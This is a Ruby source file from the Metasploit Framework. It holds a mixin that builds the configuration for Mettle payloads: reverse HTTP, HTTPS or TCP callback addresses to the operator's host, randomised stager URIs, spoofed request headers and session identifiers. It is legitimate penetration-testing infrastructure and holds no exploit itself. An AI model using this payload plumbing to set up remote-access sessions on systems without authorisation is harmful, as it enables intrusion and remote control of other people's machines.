GitHub Repository: rapid7/metasploit-framework
Path: blob/master/lib/msf/base/sessions/mettle_config.rb
# -*- coding: binary -*-
require 'base64'
require 'securerandom'
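module Msf
module Sessions

# Mixin shared by the Mettle payload modules: registers the Mettle-specific
# advanced options and assembles the transport configuration that is handed
# to the Mettle binary.
module MettleConfig

  include Msf::Payload::TransportConfig

  # Registers the Mettle-specific advanced options once the including
  # payload's own initialisation has run.
  #
  # @param info [Hash] module info hash, forwarded unchanged to +super+
  def initialize(info = {})
    super

    register_advanced_options(
      [
        OptBool.new(
          'MeterpreterTryToFork',
          'Fork a new process if the functionality is available',
          default: false
        )
      ]
    )
  end

  # Builds the UUID-bearing init-connect URI used by the HTTP(S) transports.
  #
  # +StagerURILength+ controls the URI length. When it is unset (0) a length
  # is drawn at random so the URI length is not constant; an explicit value
  # below 5 is rejected as too short.
  #
  # @param opts [Hash] may carry :datastore (overrides the module datastore)
  #   and :uuid (forwarded to generate_uri_uuid_mode)
  # @return [String] the generated URI
  # @raise [ArgumentError] if StagerURILength is set below 5
  def generate_uri(opts = {})
    ds = opts[:datastore] || datastore
    uri_req_len = ds['StagerURILength'].to_i

    # Unset: pick a random length of at least 30 (plus the LURI prefix),
    # bounded so the total stays around 128 characters at most.
    if uri_req_len == 0
      base_len = 30 + luri.length
      uri_req_len = base_len + rand(127 - base_len)
    end

    raise ArgumentError, 'Minimum StagerURILength is 5' if uri_req_len < 5

    generate_uri_uuid_mode(:init_connect, uri_req_len, uuid: opts[:uuid])
  end

  # Renders one optional +--opt 'value'+ switch for the Mettle config line,
  # or an empty string when the option is absent.
  #
  # The value is wrapped in single quotes, so embedded single quotes are
  # backslash-escaped. The escape is produced in a block on purpose: in a
  # plain gsub replacement string, "\\'" is the post-match back-reference
  # ($'), not a literal backslash-quote, so the string form silently emits
  # the rest of the value instead of an escape.
  #
  # @param opts [Hash] transport options
  # @param opt [Symbol] key to render (e.g. :ua, :host, :referer, :header)
  # @return [String] "--opt 'value' " with a trailing space, or ''
  def generate_uri_option(opts, opt)
    value = opts[opt]
    return '' unless value

    escaped = value.gsub("'") { "\\'" }
    "--#{opt} '#{escaped}' "
  end

  # Builds the HTTP(S) transport string: the target URL followed by a '|'
  # separator and the optional header switches (UA, Host, Referer, Cookie).
  #
  # Note: when :cookie is set, opts[:header] is written into +opts+ as a
  # side effect before it is rendered.
  #
  # @param opts [Hash] :scheme, :lhost, :lport plus optional :ua, :host,
  #   :referer, :cookie
  # @return [String] the transport string with surrounding whitespace removed
  def generate_http_uri(opts)
    target_uri = "#{mettle_scheme_and_host(opts)}:#{opts[:lport]}#{luri}#{generate_uri(opts)}|"

    target_uri << generate_uri_option(opts, :ua)
    target_uri << generate_uri_option(opts, :host)
    target_uri << generate_uri_option(opts, :referer)
    if opts[:cookie]
      opts[:header] = "Cookie: #{opts[:cookie]}"
      target_uri << generate_uri_option(opts, :header)
    end

    target_uri.strip
  end

  # Builds the TCP transport string, "scheme://host:port", with IPv6
  # literals bracketed.
  #
  # @param opts [Hash] :scheme, :lhost, :lport
  # @return [String]
  def generate_tcp_uri(opts)
    "#{mettle_scheme_and_host(opts)}:#{opts[:lport]}"
  end

  # Assembles the configuration hash handed to the Mettle payload.
  #
  # Resolves the transport URI for the requested scheme, encodes the payload
  # UUID and a per-session GUID, and returns only the keys Mettle consumes.
  # +opts+ is mutated in place (by the transport helpers and by this method)
  # in addition to being sliced for the return value.
  #
  # @param opts [Hash] :scheme ('http', 'https' or 'tcp'); optional
  #   :datastore, :uuid, :name, :stageless, :debug, :log_file and the
  #   transport options consumed by the transport_config_* helpers
  # @return [Hash] :uuid, :session_guid, :uri, :debug, :log_file, :name,
  #   :background
  # @raise [ArgumentError] for an unrecognised :scheme
  def generate_config(opts = {})
    ds = opts[:datastore] || datastore

    opts[:background] = ds['MeterpreterTryToFork'] ? 1 : 0

    # A configured process command line only applies when the caller did
    # not already supply a name.
    if ds['PayloadProcessCommandLine'] != ''
      opts[:name] ||= ds['PayloadProcessCommandLine']
    end

    opts[:uuid] ||= generate_payload_uuid

    opts[:uri] =
      case opts[:scheme]
      when 'http'  then generate_http_uri(transport_config_reverse_http(opts))
      when 'https' then generate_http_uri(transport_config_reverse_https(opts))
      when 'tcp'   then generate_tcp_uri(transport_config_reverse_tcp(opts))
      else raise ArgumentError, "Unknown scheme: #{opts[:scheme]}"
      end

    # strict_encode64 never inserts line breaks, so no strip is needed; for
    # inputs this short it yields exactly what encode64(...).strip did.
    opts[:uuid] = Base64.strict_encode64(opts[:uuid].to_raw)

    # Stageless sessions get an all-zero GUID, everything else a fresh random
    # one. The comparison is deliberately strict: only literal +true+ counts.
    guid =
      if opts[:stageless] == true
        "\x00" * 16
      else
        [SecureRandom.uuid.delete('-')].pack('H*')
      end
    opts[:session_guid] = Base64.strict_encode64(guid)

    opts.slice(:uuid, :session_guid, :uri, :debug, :log_file, :name, :background)
  end

  # Stage encoding is not safe for Mettle (doesn't apply to stageless)
  #
  # Always returns false. If the operator enabled EnableStageEncoding, a
  # warning is printed once per instance (tracked via @warned).
  #
  # @return [false]
  def encode_stage?
    if datastore['EnableStageEncoding'] && !@warned
      print_warning("Stage encoding is not supported for #{refname}")
      @warned = true
    end

    false
  end

  private

  # Returns "scheme://host", bracketing IPv6 literals so that a following
  # ":port" suffix stays unambiguous.
  #
  # @param opts [Hash] :scheme and :lhost
  # @return [String]
  def mettle_scheme_and_host(opts)
    host = opts[:lhost]
    host = "[#{host}]" if Rex::Socket.is_ipv6?(host)
    "#{opts[:scheme]}://#{host}"
  end

end
end
end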